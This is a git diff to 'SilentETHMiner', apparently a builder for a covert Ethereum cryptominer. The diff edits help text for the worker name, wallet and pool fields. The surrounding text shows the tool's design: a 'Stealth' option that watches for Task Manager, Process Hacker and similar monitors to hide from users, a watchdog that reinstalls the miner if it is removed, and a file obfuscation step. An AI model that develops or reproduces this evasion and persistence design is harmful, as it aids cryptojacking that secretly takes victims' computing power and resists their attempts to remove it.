diff --git a/SilentETHMiner/Advanced.resx b/SilentETHMiner/Advanced.resx
index 69bef06..e458538 100644
--- a/SilentETHMiner/Advanced.resx
+++ b/SilentETHMiner/Advanced.resx
@@ -131,6 +131,7 @@ After you have obfuscated the file press OK on the message box that appears to m
The programs that the "Stealth" option should check for. Separate the programs with a comma (,) just like the default entry.
+Windows does have a 8191 character limit in the command line arguments so any big collections of programs should probably be entered with the "Remote Configuration" feature.
Default: Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe
diff --git a/SilentETHMiner/Form1.Designer.vb b/SilentETHMiner/Form1.Designer.vb
index ccdd082..8158133 100644
--- a/SilentETHMiner/Form1.Designer.vb
+++ b/SilentETHMiner/Form1.Designer.vb
@@ -152,8 +152,7 @@ Partial Class Form1
Me.Label13.Size = New System.Drawing.Size(13, 13)
Me.Label13.TabIndex = 48
Me.Label13.Text = "?"
- Me.TooltipHelper.SetToolTip(Me.Label13, "The worker name to mine with. You can also enter {%RANDOM%} to randomize a new nu" &
- "mber every startup or enter {%COMPUTERNAME%} to get the computer name.")
+ Me.TooltipHelper.SetToolTip(Me.Label13, resources.GetString("Label13.ToolTip"))
'
'helpLabelPassword
'
@@ -181,7 +180,8 @@ Partial Class Form1
Me.Label10.TabIndex = 45
Me.Label10.Text = "?"
Me.TooltipHelper.SetToolTip(Me.Label10, "Extra data to send to the pool, separate the data with a '/' like so: data1/data2" &
- "/data3. An example could be WorkerName/email@test.com on some pools.")
+ "/data3. An example could be WorkerName/email%40test.com (%40 means @) on some po" &
+ "ols.")
'
'helpLabelPool
'
@@ -208,9 +208,7 @@ Partial Class Form1
Me.helpLabelWallet.Size = New System.Drawing.Size(13, 13)
Me.helpLabelWallet.TabIndex = 38
Me.helpLabelWallet.Text = "?"
- Me.TooltipHelper.SetToolTip(Me.helpLabelWallet, "The Ethereum wallet address to mine to. Required on most pools but for some pools" &
- " that use a username or email you should leave this blank and enter the username" &
- "/email into the 'Extra data' field.")
+ Me.TooltipHelper.SetToolTip(Me.helpLabelWallet, "The Ethereum wallet address to mine to. Some pools use a username instead.")
'
'Label4
'
diff --git a/SilentETHMiner/Form1.resx b/SilentETHMiner/Form1.resx
index c17f604..53172b3 100644
--- a/SilentETHMiner/Form1.resx
+++ b/SilentETHMiner/Form1.resx
@@ -123,6 +123,10 @@
343, 17
+
+ The worker name to mine with. You can also enter {RANDOM} to randomize a new number, enter {USERNAME} to get the username or enter {COMPUTERNAME} to get the computer name.
+On some pools like nanopool if you want to enter extra things like password/email you should leave this blank and enter the workername/email into the 'Extra data' field.
+
Starts a separate program that monitors the miner to see if it's still running and located in the installed path. If it's not running or missing it will start and copy the miner back to the install location.